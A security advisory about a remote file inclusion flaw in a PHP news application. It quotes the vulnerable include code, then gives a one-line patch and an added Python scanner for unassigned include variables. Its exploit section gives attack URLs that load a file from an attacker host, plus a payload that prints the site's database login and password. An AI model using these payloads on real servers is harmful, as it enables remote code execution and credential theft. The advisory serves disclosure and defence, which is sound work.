Information :
°°°°°°°°°°°°°
Language : PHP
Tested version : 1
Problem : bad use of include()

PHP Code :
°°°°°°°°°°
-------Include/variables.php3-------
<?
$Mac="localhost";
$Uti="root";
$Mot="";
$Bd="phpnews";
$AnneeDeDemarrage="2000";
$MoisDeDemarrage="8";
$NbNouvelles=5;
// $Include is not set anywhere in this file
require("$Include/french.inc");
?>
-----------------------------------

and Include/lib.inc.php3 :
------------------------------------
include("$Include/config.inc.php3");
------------------------------------

Exploits :
°°°°°°°°°°
http://[target]/variables.php3?Include=http://[attacker]

with, in the file http://[attacker]/french.inc :

<? print("<center><u>MySQL Infos</u></center>\n\nServeur: $Mac \nLogin: $Uti \nPass: $Mot \nDB Name: $Bd"); ?>

and

http://[target]/Include/lib.inc.php3?http://[attacker]

with bad PHP code in the file : http://[attacker]/config.inc.php3

Patch :
°°°°°°°
Add to the beginning of :
----------------------
Include/lib.inc.php3
Include/variables.php3
----------------------
the line :

$Include="Include";

More details in French : http://www.frog-man.org/tutos/phpnewsDev.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpnewsDev.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII

frog-m@n
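
A way to check that the patch above has been applied, as an added example (not part of the original advisory or of the affected application): a Python scan that flags every include()/require() whose path uses a variable with no assignment earlier in the same file. The function name, the regex heuristics (this is not a PHP parser) and the <? ?> wrapper around the lib.inc.php3 line are assumptions of this example.

```python
import re

# Heuristic patterns (assumption: plain regex scan, not a real PHP parser).
ASSIGN_RE = re.compile(r'\$([A-Za-z_]\w*)\s*=(?![=>])')
INCLUDE_RE = re.compile(
    r'(?<![$\w])(?:include|require)(?:_once)?(?:\s*\(|\s+)\s*([^;]*)', re.I)
VAR_RE = re.compile(r'\$([A-Za-z_]\w*)')


def unassigned_include_vars(php_source):
    """Return [(line_no, var)] for every include/require whose path uses a
    variable that is not assigned earlier in the same file."""
    first_assign = {}  # variable name -> offset of its first assignment
    for m in ASSIGN_RE.finditer(php_source):
        first_assign.setdefault(m.group(1), m.start())

    findings = []
    for inc in INCLUDE_RE.finditer(php_source):
        line_no = php_source.count("\n", 0, inc.start()) + 1
        for var in VAR_RE.findall(inc.group(1)):
            # Never assigned, or assigned only after the include runs.
            if first_assign.get(var, len(php_source)) > inc.start():
                findings.append((line_no, var))
    return findings


# Include/variables.php3 as quoted in the advisory.
VULNERABLE = """<?
$Mac="localhost";
$Uti="root";
$Mot="";
$Bd="phpnews";
$AnneeDeDemarrage="2000";
$MoisDeDemarrage="8";
$NbNouvelles=5;
require("$Include/french.inc");
?>"""

# The single line the advisory quotes from Include/lib.inc.php3,
# wrapped in constructed <? ?> tags.
LIB = '<?\ninclude("$Include/config.inc.php3");\n?>'

# variables.php3 with the advisory's patch line added at the beginning.
PATCHED = VULNERABLE.replace("<?\n", '<?\n$Include="Include";\n', 1)

if __name__ == "__main__":
    for name, src in [("variables.php3", VULNERABLE), ("lib.inc.php3", LIB),
                      ("variables.php3 (patched)", PATCHED)]:
        print(name, unassigned_include_vars(src) or "ok")
```

A variable the file never assigns can only get its value from outside the file, which is why the scan treats it as untrusted.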